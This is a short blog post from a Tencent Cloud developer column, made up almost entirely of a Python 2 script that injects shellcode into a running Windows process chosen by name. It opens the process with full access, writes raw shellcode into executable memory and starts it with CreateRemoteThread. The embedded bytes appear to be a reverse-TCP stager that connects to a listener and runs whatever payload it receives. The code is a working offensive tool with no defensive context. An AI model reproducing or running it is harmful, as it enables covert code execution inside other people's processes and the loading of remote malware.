前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >python进程注入shellcode

python进程注入shellcode

作者头像
py3study
发布2020-01-08 18:07:23
1.3K0
发布2020-01-08 18:07:23
举报
文章被收录于专栏:python3python3
代码语言:javascript
复制
import sys
import psutil  
import ctypes  
from ctypes import *  
  
PAGE_EXECUTE_READWRITE         = 0x00000040  
PROCESS_ALL_ACCESS =     ( 0x000F0000 | 0x00100000 | 0xFFF )  
VIRTUAL_MEM        =     ( 0x1000 | 0x2000 )  
  
kernel32      = windll.kernel32  
pName         = sys.argv[1]  
  
if not sys.argv[1]:  
    print "Code Injector: ./code_injector.py <name to inject>"  
    sys.exit(0)  
  
# shellcode = \  
# "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\  
# "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\  
# "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\  
# "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"\  
# "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"\  
# "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"\  
# "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"\  
# "\x49\x0b\x31\xc0\x51\x50\xff\xd7";  

shellcode =  ""
shellcode += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shellcode += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shellcode += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shellcode += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shellcode += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shellcode += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shellcode += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shellcode += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shellcode += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shellcode += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shellcode += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shellcode += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shellcode += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shellcode += "\xff\xd5\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11"
shellcode += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
shellcode += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
shellcode += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
shellcode += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
shellcode += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
shellcode += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
shellcode += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
shellcode += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
shellcode += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
shellcode += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
shellcode += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0"
shellcode += "\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
  
  
  
code_size     = len(shellcode)  
  
TH32CS_SNAPPROCESS = 0x00000002  
class PROCESSENTRY32(ctypes.Structure):  
     _fields_ = [("dwSize", ctypes.c_ulong),  
                 ("cntUsage", ctypes.c_ulong),  
                 ("th32ProcessID", ctypes.c_ulong),  
                 ("th32DefaultHeapID", ctypes.c_ulong),  
                 ("th32ModuleID", ctypes.c_ulong),  
                 ("cntThreads", ctypes.c_ulong),  
                 ("th32ParentProcessID", ctypes.c_ulong),  
                 ("pcPriClassBase", ctypes.c_ulong),  
                 ("dwFlags", ctypes.c_ulong),  
                 ("szExeFile", ctypes.c_char * 260)]  
  
# def getProcPid(procName):  
#     CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot  
#     Process32First = ctypes.windll.kernel32.Process32First  
#     Process32Next = ctypes.windll.kernel32.Process32Next  
#     CloseHandle = ctypes.windll.kernel32.CloseHandle  
      
#     hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)  
      
#     pe32 = PROCESSENTRY32()  
#     pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)  
#     if Process32First(hProcessSnap,ctypes.byref(pe32)) == False:  
#         return  
#     if pe32.szExeFile == procName:  
#         CloseHandle(hProcessSnap)  
#         return pe32.th32ProcessID  
      
#     while True:  
#         #yield pe32 #save the pe32  
#         if Process32Next(hProcessSnap,ctypes.byref(pe32)) == False:  
#             break  
#         if pe32.szExeFile == procName:  
#             CloseHandle(hProcessSnap)  
#             return pe32.th32ProcessID  
          
#     CloseHandle(hProcessSnap)  


def getProcName(pname):
    """ get process by name
    
    return the first process if there are more than one
    """
    for proc in psutil.process_iter():
        try:
            if proc.name().lower() == pname.lower():
                return str(proc).split('=')[1].split(',')[0]  # return if found one
        except psutil.AccessDenied:
            pass
        except psutil.NoSuchProcess:
            pass
    return None

  
procPid = int(getProcName(pName))  
# procPid = 40560
print procPid  
  
# Get a handle to the process we are injecting into.  
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, procPid )  
  
if not h_process:  
  
    print "[*] Couldn't acquire a handle to PID: %s" % pid  
    sys.exit(0)  
  
# Allocate some space for the shellcode  
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)  
  
# Write out the shellcode  
written = c_int(0)  
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))  
  
# Now we create the remote thread and point it's entry routine  
# to be head of our shellcode  
thread_id = c_ulong(0)  
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):  
  
    print "[*] Failed to inject process-killing shellcode. Exiting."  
    sys.exit(0)  
  
print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value  
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2019-09-04 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档